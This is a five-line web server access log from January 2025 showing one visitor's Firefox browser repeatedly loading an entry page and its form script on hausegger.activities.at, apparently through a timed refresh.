178.165.186.69 - - [21/Jan/2025:10:52:01 +0100] "GET /entry.php?id=10271&&ser=453061 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=453001" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:52:01 +0100] "GET /gui/javascript/form_form.js?1737453121 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=453061" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:53:04 +0100] "GET /entry.php?id=10271&&ser=453121 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=453061" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:53:04 +0100] "GET /gui/javascript/form_form.js?1737453184 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=453121" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:54:04 +0100] "GET /entry.php?id=10271&&ser=453184 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=453121" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
